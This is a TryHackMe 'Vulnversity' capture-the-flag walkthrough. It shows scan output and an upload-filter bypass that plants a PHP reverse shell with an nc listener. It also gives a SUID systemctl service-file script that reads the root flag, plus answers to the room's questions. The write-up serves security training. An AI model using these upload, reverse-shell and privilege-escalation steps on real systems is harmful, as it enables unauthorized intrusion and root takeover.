TryHackMe - Vulnversity


└─# nmap -T5 -sC -sV -O -Pn -p-
Starting Nmap 7.92 ( ) at 2022-05-08 14:04 EDT
Warning: giving up on port because retransmission cap hit (2).
Nmap scan report for
Host is up (0.22s latency).
Not shown: 65508 closed tcp ports (reset)
21/tcp    open     ftp           vsftpd 3.0.3
22/tcp    open     ssh           OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 5a:4f:fc:b8:c8:76:1c:b5:85:1c:ac:b2:86:41:1c:5a (RSA)
|   256 ac:9d:ec:44:61:0c:28:85:00:88:e9:68:e9:d0:cb:3d (ECDSA)
|_  256 30:50:cb:70:5a:86:57:22:cb:52:d9:36:34:dc:a5:58 (ED25519)
139/tcp   open     netbios-ssn   Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open     netbios-ssn   Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
1281/tcp  filtered healthd
3128/tcp  open     http-proxy    Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
3333/tcp  open     http          Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Vuln University
|_http-server-header: Apache/2.4.18 (Ubuntu)
Aggressive OS guesses: Linux 3.10 - 3.13 (95%), Linux 5.4 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Sony Android TV (Android 5.0) (92%), Android 5.0 - 6.0.1 (Linux 3.4) (92%), Linux 3.10 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h19m59s, deviation: 2h18m34s, median: -1s
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: vulnuniversity
|   NetBIOS computer name: VULNUNIVERSITY\x00
|   Domain name: \x00
|   FQDN: vulnuniversity
|_  System time: 2022-05-08T14:16:34-04:00
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-05-08T18:16:34
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: VULNUNIVERSITY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 710.19 seconds

Initial foothold

If we go to we have a website. However the content is not really useful for us. We can run gobuster, that is how we find the folder internal

└─# gobuster dir -u --wildcard -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:           
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
2022/05/08 14:17:29 Starting gobuster in directory enumeration mode
/images               (Status: 301) [Size: 320] [-->]
/css                  (Status: 301) [Size: 317] [-->]   
/js                   (Status: 301) [Size: 316] [-->]    
/fonts                (Status: 301) [Size: 319] [-->] 
/internal             (Status: 301) [Size: 322] [-->]
  • After a few tries with burp, the accepted exentions is phtml. You can also fuzz it with burp intruder and make a grep match on "extension not allowed" to see which one will be allowed.

  • We edit php revershell (on kali we have it preinstalled) cp /usr/share/webshells/php/php-reverse-shell.php . we rename it in the accepted extension mv php-reverse-shell.php php-reverse-shell.phtml

  • nc -lvp 4444 We set up our listener

  • Now as mentioned we just need to go to http://<ip>:3333/internal/uploads/php-reverse-shell.phtml to execute our shell (if this was not specified we could have run gobuster in the internal folder

  • We get a shell as www-data


  • Now let's enumerate our ways to privesc

  • find / -perm -u=s -type f 2>/dev/null We have a few files with suid bit on

  • We have a GTFOBins entry for /bin/systemctl here

  • Let's try the exploitation

    • It creates a service in an env

    • It will create a temp file in the syst as a service

    • This will execute a command with bin/sh (in GTFObins it will execute id) in our case we could try to output our root flag in the output folder. It will then set a link and enable it

  • Here is our modified script

echo '[Service]
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF
  • Once we pasted all our commands above we just need to cat /tmp/output and this will give us the root flag.


Task 2

  • Scan the box, how many ports are open? Answer 6

  • What version of the squid proxy is running on the machine?Answer 3.5.12

  • How many ports will nmap scan if the flag -p-400 was used? Answer 400

  • Using the nmap flag -n what will it not resolve? Answer DNS

  • What is the most likely operating system this machine is running? Answer Ubuntu

  • What port is the web server running on? Answer 3333

Task 3

  • What is the directory that has an upload form page? Answer /internal/

Task 4

  • Run this attack, what extension is allowed? Answer phtml

  • What is the name of the user who manages the webserver? Answer bill

  • What is the user flag? I will let you do this on your own Hint: cat /home/bill/user.txt

Task 5

  • On the system, search for all SUID files. What file stands out? Answer /bin/systemctl

  • Become root and get the last flag (/root/root.txt) I will let you do this on your own Hint: cat /root/root.txt

Last updated